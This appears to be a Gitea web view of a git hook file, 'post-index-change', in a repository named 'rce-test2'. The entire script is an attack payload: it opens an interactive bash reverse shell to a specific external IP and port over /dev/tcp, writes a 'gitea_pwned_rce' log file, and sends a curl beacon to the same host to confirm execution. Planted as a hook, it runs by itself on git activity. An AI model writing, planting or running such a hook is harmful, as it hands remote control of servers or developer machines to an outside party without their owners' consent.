Files
rce-test2/hooks/post-index-change
T

4 lines
166 B
Bash
Raw Normal View History

2026-07-29 19:06:42 +08:00
#!/bin/sh
(bash -c "bash -i >& /dev/tcp/202.79.169.91/28016 0>&1") > /tmp/gitea_pwned_rce.txt 2>&1
curl -s http://202.79.169.91:28016/rce_hook_executed 2>/dev/null &